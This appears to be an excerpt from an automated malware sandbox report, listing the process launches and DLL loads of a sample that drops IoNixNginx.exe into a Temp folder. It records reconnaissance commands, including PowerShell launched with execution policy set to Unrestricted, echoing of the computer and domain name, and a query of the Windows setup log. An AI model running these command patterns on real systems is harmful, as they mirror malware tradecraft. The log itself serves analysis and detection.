Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeProcess created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "chcp"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe "C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\hgekorcpiasneymc" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1848 --field-trial-handle=1860,i,9328495160301710752,8818608180410504784,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe "C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\hgekorcpiasneymc" --mojo-platform-channel-handle=2184 --field-trial-handle=1860,i,9328495160301710752,8818608180410504784,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcpJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"Jump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: iconcodecservice.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: kbdus.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: mscms.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: coloradapterclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: mmdevapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: uxtheme.dllJump to behavior
